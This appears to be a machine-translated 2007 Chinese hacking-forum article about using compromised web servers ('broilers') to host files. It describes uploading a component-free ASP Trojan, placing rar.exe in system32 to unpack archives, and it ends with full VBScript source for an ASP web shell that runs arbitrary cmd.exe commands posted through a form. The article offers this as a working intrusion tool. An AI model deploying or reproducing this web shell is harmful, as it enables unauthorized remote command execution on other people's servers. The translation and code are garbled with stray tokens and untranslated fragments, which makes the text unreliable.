With ASP Trojan FTP and decompression-vulnerability warning-the black bar safety net

ID MYHACK58:62200714177
Type myhack58
Reporter 佚名
Modified 2007-02-11T00:00:00


In broilers placed on the website,the most troublesome is probably the update and upload a lot of files, Terminal Services broad daylight easy to be found,open your own ftp and not assured. Your own online in a circle is found by combining the non-component upload asp Trojan can be easily achieved.

asp Trojan everyone is familiar with,is nothing more than a cmd,what is the role of Ah,you wait,listen to me slowly say. The overall idea is first by ftp,1 3 9,or winshell Upload a no components of the asp program. I chose the environment of the webedit(actually this has not a mere non-component upload tool,through which you can also modify,delete a file/directory,can be used to update the page Oh,made up the AD,I tell him no relatives Ah,flashed a flying bottle..continued)and an asp Trojan(if,indeed too lazy to find. Finally, with the source code,paste, Save As a asp file),remember to be in the broiler of the web directory. In fact, most of the problems webedit can be solved,however, if there are many files A A upload in trouble,怎么办 ? 这下 asp 木马 用 上 了 . 找 一 个 rar.exe(all Packed by the winrar directory has,maybe the chickens have been fine,if it is another command-line unzip tool can also be Oh)get it to copy to the%SystemRoot%/system32/. Uploaded. zip or. rar file to the broiler of the web directory. In the browser address bar to open the asp Trojan(temporarily referred to as trojan. asp),in the text text box enter the rar-x source.rar path decompression is successful,V,wait a minute how to get the web directory absolute path(path)? I use the soil method,the modified trojan. asp added a line to convert the virtual directory into an absolute path and the output of the statement is < % =server. mappath(".") %>,"." Can be freely changed to any relative virtual directories.

Just to provide an idea,what if a cow could write a asp decompression that better myself,however? Who will?, I won't,will you? As for how to hide the virtual directory,support Simplified Chinese display is not the article of discussion,the old adage,Safety first,generally placed on a small forum or a chat room on it,if really put on individual homepage,also put their contact address,telephone numbers are also left to the people is not good. ps. junesun recommendations directly made self-extracting, do not know will not pop-up dialog box.

-------- The following is the asp Trojan of source code,advice in<html>after<% =server. mappath(".") %>------------------------------

<%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next < a

'-- create the COM objects that we will be using --' Set oScript = Server. createObject("WSCRIPT. SHELL") Set oScriptNet = Server. createObject("WSCRIPT. NETWORK") Set oFileSys = Server. createObject("Scripting. FileSystemObject") < a

'-- check for a command that we have posted --' szCMD = Request. form(". CMD") If (szCMD <> "") Then < a

'-- Use a poor man's pipe ... a temp file --' szTempFile = "C:/" & amp; oFileSys. GetTempName( ) Call oScript. Run ("cmd.exe /c" &szCMD & " > " &szTempFile, 0, True) Set oFile = oFileSys. OpenTextFile (szTempFile, 1, False, 0) of <

End If Of <

%> <HTML> <BODY> <form action="<%= Request. ServerVariables("URL") %>" method="POST"> <input type=text name=". CMD" size=4 of 5 value="<%= szCMD %>"> <input type=submit value="Run" > the </form> <PRE> <

<% If (IsObject(oFile)) Then '-- Read the output from our command and remove the temp file --' On Error Resume Next Response. Write The Server. HTMLEncode(oFile. ReadAll) oFile. Close Call oFileSys. deleteFile(szTempFile, True) End If %> </BODY> </HTML> a >